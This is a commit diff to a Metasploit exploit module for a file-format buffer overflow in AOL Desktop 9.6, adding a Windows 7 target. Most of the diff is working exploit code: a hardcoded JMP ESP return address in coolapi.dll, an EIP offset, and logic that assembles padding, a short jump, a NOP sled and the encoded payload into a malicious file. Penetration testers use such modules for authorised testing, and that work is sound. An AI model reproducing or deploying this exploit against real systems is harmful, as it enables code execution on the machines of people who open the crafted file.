Added Win 7 target

git-svn-id: file:///home/svn/framework3/trunk@12361 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-19 03:10:36 +00:00 · 2011-04-19 03:10:36 +00:00 · d4dd84536d
parent 417991e534
commit d4dd84536d
1 changed files with 27 additions and 7 deletions
--- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
+++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
@ -29,10 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'	     => "$Revision$",
 			'Author'         =>
 				[
-					'sup3r',     #Initial disclosure, poc (9.5)
-					'sickn3ss',  #9.6 poc
-					'sinn3r',    #Metasploit
-					'mr_me',     #NX bypass target
+					'sup3r',        #Initial disclosure, poc (9.5)
+					'sickn3ss',     #9.6 poc
+					'sinn3r',       #Metasploit
+					'mr_me',        #NX bypass target
+					'silent_dream', #Win 7 target
 				],
 			'References'     =>
 				[
@ -60,7 +61,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Max'   => 8000,        #Buffer max. Can be more.
 						},
 					],
-
 					[
 						'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
 						{
@ -70,6 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Max'    => 8000,        # Buffer max. Can be more.
 						},
 					],
+					[
+						'AOL Desktop 9.6 on Windows 7',
+						{
+							'Ret'    => 0x63227D6D,  # JMP ESP in coolapi.dll
+							'Offset' => 4327,        # Offset to EIP
+							'Max'    => 8000,        # Buffer max. Can be more
+						}
+					],
 				],
 			'Privileged'	 => false,
 			'DisclosureDate' => "Jan 31 2011",
@ -85,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit

-		if target.name !~ /SP3 - NX bypass/
+		if target.name =~ /XP SP3$/

 			# Compatible with what the poc has, and what I see on my debugger
 			sploit  = ''
@ -101,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			sploit << payload.encoded
 			sploit << rand_text_alpha(target['Max']-sploit.length)

-		else
+		elsif target.name =~ /SP3 - NX bypass$/

 			#Thanks mr_me for the ROP chain

@ -173,6 +181,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			#Padding
 			sploit << rand_text_alpha(target['Max']-sploit.length)

+		elsif target.name =~ /Windows 7/
+
+			#Thanks silent_dream
+
+			sploit  = ''
+			sploit << rand_text_alpha(target['Offset']-2)
+			sploit << "\xeb\x10"
+			sploit << [target.ret].pack('V')
+			sploit << make_nops(16)
+			sploit << payload.encoded
+			sploit << rand_text_alpha(target['Max'] - sploit.length)
+
 		end

 		link_value = rand_text_alpha(6)